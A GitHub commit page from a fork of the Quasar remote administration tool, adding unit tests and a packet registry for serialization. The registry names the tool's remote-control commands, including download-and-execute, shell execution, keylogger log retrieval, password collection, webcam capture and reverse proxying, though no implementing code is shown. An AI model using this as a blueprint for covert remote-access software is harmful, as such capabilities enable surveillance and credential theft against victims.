forked from quasar/Quasar
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Tests added for packet registeration for serialization
- Loading branch information
1 parent
86b399e
commit 397da1c
Showing
10 changed files
with
242 additions
and
163 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
using System; | ||
using Microsoft.VisualStudio.TestTools.UnitTesting; | ||
using System.Reflection; | ||
using System.Linq; | ||
using xClient.Core.Packets; | ||
|
||
namespace xClient.Tests.Core.Packet | ||
{ | ||
[TestClass] | ||
public class PacketTest | ||
{ | ||
[TestMethod] | ||
public void AreAllPacketsRegistered() | ||
{ | ||
var asm = Assembly.Load("Client"); | ||
var expectedPacketTypes = asm.GetTypes().Where(t => t.GetInterfaces().Contains(typeof(IPacket)) && t.GetCustomAttributes(typeof(SerializableAttribute), false).Any()).ToArray(); | ||
var registeredPackets = PacketRegistery.GetPacketTypes(); | ||
CollectionAssert.AreEquivalent(expectedPacketTypes, registeredPackets); | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
using System; | ||
using System.Collections.Generic; | ||
using System.Linq; | ||
using System.Text; | ||
|
||
namespace xClient.Core.Packets | ||
{ | ||
public class PacketRegistery | ||
{ | ||
public static Type[] GetPacketTypes() | ||
{ | ||
return new Type[] | ||
{ | ||
typeof (Packets.ServerPackets.GetAuthentication), | ||
typeof (Packets.ServerPackets.DoClientDisconnect), | ||
typeof (Packets.ServerPackets.DoClientReconnect), | ||
typeof (Packets.ServerPackets.DoClientUninstall), | ||
typeof (Packets.ServerPackets.DoWebcamStop), | ||
typeof (Packets.ServerPackets.DoAskElevate), | ||
typeof (Packets.ServerPackets.DoDownloadAndExecute), | ||
typeof (Packets.ServerPackets.DoUploadAndExecute), | ||
typeof (Packets.ServerPackets.GetDesktop), | ||
typeof (Packets.ServerPackets.GetProcesses), | ||
typeof (Packets.ServerPackets.DoProcessKill), | ||
typeof (Packets.ServerPackets.DoProcessStart), | ||
typeof (Packets.ServerPackets.GetDrives), | ||
typeof (Packets.ServerPackets.GetDirectory), | ||
typeof (Packets.ServerPackets.DoDownloadFile), | ||
typeof (Packets.ServerPackets.DoMouseEvent), | ||
typeof (Packets.ServerPackets.DoKeyboardEvent), | ||
typeof (Packets.ServerPackets.GetSystemInfo), | ||
typeof (Packets.ServerPackets.DoVisitWebsite), | ||
typeof (Packets.ServerPackets.DoShowMessageBox), | ||
typeof (Packets.ServerPackets.DoClientUpdate), | ||
typeof (Packets.ServerPackets.GetMonitors), | ||
typeof (Packets.ServerPackets.GetWebcams), | ||
typeof (Packets.ServerPackets.GetWebcam), | ||
typeof (Packets.ServerPackets.DoShellExecute), | ||
typeof (Packets.ServerPackets.DoPathRename), | ||
typeof (Packets.ServerPackets.DoPathDelete), | ||
typeof (Packets.ServerPackets.DoShutdownAction), | ||
typeof (Packets.ServerPackets.GetStartupItems), | ||
typeof (Packets.ServerPackets.DoStartupItemAdd), | ||
typeof (Packets.ServerPackets.DoStartupItemRemove), | ||
typeof (Packets.ServerPackets.DoDownloadFileCancel), | ||
typeof (Packets.ServerPackets.GetKeyloggerLogs), | ||
typeof (Packets.ServerPackets.DoUploadFile), | ||
typeof (Packets.ServerPackets.GetPasswords), | ||
typeof (Packets.ServerPackets.DoLoadRegistryKey), | ||
typeof (Packets.ServerPackets.DoCreateRegistryKey), | ||
typeof (Packets.ServerPackets.DoDeleteRegistryKey), | ||
typeof (Packets.ServerPackets.DoRenameRegistryKey), | ||
typeof (Packets.ServerPackets.DoCreateRegistryValue), | ||
typeof (Packets.ServerPackets.DoDeleteRegistryValue), | ||
typeof (Packets.ServerPackets.DoRenameRegistryValue), | ||
typeof (Packets.ServerPackets.DoChangeRegistryValue), | ||
typeof (Packets.ServerPackets.SetAuthenticationSuccess), | ||
typeof (Packets.ServerPackets.GetConnections), | ||
typeof (Packets.ServerPackets.DoCloseConnection), | ||
typeof (Packets.ClientPackets.GetAuthenticationResponse), | ||
typeof (Packets.ClientPackets.SetStatus), | ||
typeof (Packets.ClientPackets.SetStatusFileManager), | ||
typeof (Packets.ClientPackets.SetUserStatus), | ||
typeof (Packets.ClientPackets.GetDesktopResponse), | ||
typeof (Packets.ClientPackets.GetProcessesResponse), | ||
typeof (Packets.ClientPackets.GetDrivesResponse), | ||
typeof (Packets.ClientPackets.GetDirectoryResponse), | ||
typeof (Packets.ClientPackets.DoDownloadFileResponse), | ||
typeof (Packets.ClientPackets.GetSystemInfoResponse), | ||
typeof (Packets.ClientPackets.GetMonitorsResponse), | ||
typeof (Packets.ClientPackets.GetWebcamsResponse), | ||
typeof (Packets.ClientPackets.GetWebcamResponse), | ||
typeof (Packets.ClientPackets.DoShellExecuteResponse), | ||
typeof (Packets.ClientPackets.GetStartupItemsResponse), | ||
typeof (Packets.ClientPackets.GetKeyloggerLogsResponse), | ||
typeof (Packets.ClientPackets.GetPasswordsResponse), | ||
typeof (Packets.ClientPackets.GetRegistryKeysResponse), | ||
typeof (Packets.ClientPackets.GetCreateRegistryKeyResponse), | ||
typeof (Packets.ClientPackets.GetDeleteRegistryKeyResponse), | ||
typeof (Packets.ClientPackets.GetRenameRegistryKeyResponse), | ||
typeof (Packets.ClientPackets.GetCreateRegistryValueResponse), | ||
typeof (Packets.ClientPackets.GetDeleteRegistryValueResponse), | ||
typeof (Packets.ClientPackets.GetRenameRegistryValueResponse), | ||
typeof (Packets.ClientPackets.GetChangeRegistryValueResponse), | ||
typeof (ReverseProxy.Packets.ReverseProxyConnect), | ||
typeof (ReverseProxy.Packets.ReverseProxyConnectResponse), | ||
typeof (ReverseProxy.Packets.ReverseProxyData), | ||
typeof (ReverseProxy.Packets.ReverseProxyDisconnect), | ||
typeof (Packets.ClientPackets.GetConnectionsResponse) | ||
|
||
}; | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
using System; | ||
using Microsoft.VisualStudio.TestTools.UnitTesting; | ||
using System.Reflection; | ||
using System.Linq; | ||
using xServer.Core.Packets; | ||
|
||
namespace xServer.Tests.Core.Packet | ||
{ | ||
[TestClass] | ||
public class PacketTests | ||
{ | ||
[TestMethod] | ||
public void AreAllPacketsRegistered() | ||
{ | ||
var asm = Assembly.Load("Quasar"); | ||
var expectedPacketTypes = asm.GetTypes().Where(t => t.GetInterfaces().Contains(typeof(IPacket)) && t.GetCustomAttributes(typeof(SerializableAttribute), false).Any()).ToArray(); | ||
var registeredPackets = PacketRegistery.GetPacketTypes(); | ||
CollectionAssert.AreEquivalent(expectedPacketTypes, registeredPackets); | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.